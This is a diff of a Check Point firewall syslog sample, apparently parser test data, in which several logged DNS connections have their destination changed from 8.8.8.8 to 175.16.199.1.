 <134>1 2020-03-29T16:52:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56629"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40876"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d23f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500735"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40876"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d244,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500740"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40695"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d244,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500740"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41777"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d244,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500740"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
@@ -1452,68 +1452,68 @@
 <134>1 2020-03-29T16:52:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d245,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33260"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10228"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:52:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d246,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63365"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:52:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d246,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53580"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10229"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38147"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45727"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38147"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500746"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45727"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d24c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:52:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500748"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47881"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500749"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34184"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500748"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47881"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500749"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34184"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500751"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52859"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d24f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500751"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47176"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d251,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500753"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d252,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500754"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58509"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41490"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
